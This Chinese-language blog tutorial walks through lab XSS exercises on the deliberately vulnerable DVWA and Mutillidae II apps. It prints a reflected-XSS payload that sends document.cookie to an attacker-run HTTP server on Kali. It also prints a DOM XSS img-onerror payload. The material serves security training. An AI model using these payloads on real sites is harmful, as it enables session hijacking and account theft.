devbox
IT小白
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

利用 XSS 获取 Cookie 利用DOM XSS_xss获取cookie代码

作者:IT小白 | 2024-02-27 04:28:54

xss获取cookie代码

目录

利用 XSS 获取 Cookie:

一、打开终端

1.可以从 Kali Linux界面打开终端 

​编辑 

2.启动owasp靶机

二、利用 XSS 获取 Cookie案例

 1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务:python -m http.server 88(打开服务器)

 2.使用 admin作为账号和密码,登录DWVA,并转到XSS reflection:

2.1登录DWAV,先点击Damn Vulnerable Web Application

 2.2登录页面,admin作为账号和密码

3.3 转到XSS reflection

3. 在文本框中输入以下内容(___处填上 Kali 主机 IP 地址):

 4.查看终端,你会发现出现以下信息:

利用DOM XSS 

一、启动owasp靶机环境

1.登录owasp靶机

 2.浏览器登入靶机IP,转到 Mutillidae II | OWASP 2013 | XSS | DOM | HTML5 Storage

 ​编辑

 二、利用DOM XSS案例

1.这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的

session。然后在“网络”选项卡中启用开发人员工具。

2.尝试添加一些数据,发现在开发者工具中并没有进行网络通信,绿色条显示

是输入的值:

cookbook test2

3. 如果检查"Add New"按钮,看到它在单击时调用了一个函数 addItemToStorage:

Add New

4.现在,转到 Debugger 选项卡并查找 addItemToStorage 函数, 在 index.php 的第1064 行找到了这个函数: ​编辑

 5.尝试设置一个包含 HTML 代码的键值。添加以下键作为键的新值:

Cookbook test

3

 6.如果浏览器解释 HTML 代码,则很可能也会出现 JavaScript 块。添加一个新

条目,其中包含以下键值:

利用 XSS 获取 Cookie

如果目标站点存在 XSS 漏洞并且 Cookie 并没有开启 http-only 的话,那么它们二者将是 Web 安全的巨大隐患。利用 XSS 攻击 Cookie 是一定需要一个服务器的,下面我们一起学习如何使用 XSS 来获取用户的 cookie。

一、打开终端

1.可以从 Kali Linux界面打开终端 

 

2.启动owasp靶机

二、利用 XSS 获取 Cookie案例

 1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务:python -m http.server 88(打开服务器)

 2.使用 admin作为账号和密码,登录DWVA,并转到XSS reflection:

2.1登录DWAV,先点击Damn Vulnerable Web Application

 2.2登录页面,admin作为账号和密码

3.3 转到XSS reflection

3. 在文本框中输入以下内容(___处填上 Kali 主机 IP 地址):

Bob<script>document.write('<img  src="http://___:88/'+document.cookie+'">');</script> 

(使用img图片标签,在图片地址src写入了获取cookie的指令,由于无法从src获取到图片,就会报错,报错信息中包含Cookie)

192.168.17.131

 4.查看终端,你会发现出现以下信息:

利用DOM XSS 

 利用DOM XSS攻击时,payload 是由浏览器的 DOM 接收和处理的,这意味着注入的代码永远不会在服务器端运行,并且任何服务器端验证或编码都对这种攻击无效。

一、启动owasp靶机环境

1.登录owasp靶机

 2.浏览器登入靶机IP,转到 Mutillidae II | OWASP 2013 | XSS | DOM | HTML5 Storage

 

 二、利用DOM XSS案例

1.这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的

session。然后在“网络”选项卡中启用开发人员工具。

2.尝试添加一些数据,发现在开发者工具中并没有进行网络通信,绿色条显示

是输入的值:

cookbook test2

3. 如果检查"Add New"按钮,看到它在单击时调用了一个函数 addItemToStorage:

Add New

4.现在,转到 Debugger 选项卡并查找 addItemToStorage 函数, 在 index.php 的第1064 行找到了这个函数: 

 5.尝试设置一个包含 HTML 代码的键值。添加以下键作为键的新值:

Cookbook test <H1> 3</ H1>

 6.如果浏览器解释 HTML 代码,则很可能也会出现 JavaScript 块。添加一个新

条目,其中包含以下键值:

Cookbook test <img src = X onerror  ="alert('DOM XSS')">

(使用img标签,弹出弹窗) 

 

 

 

 

 

 

 

 

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/150037
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号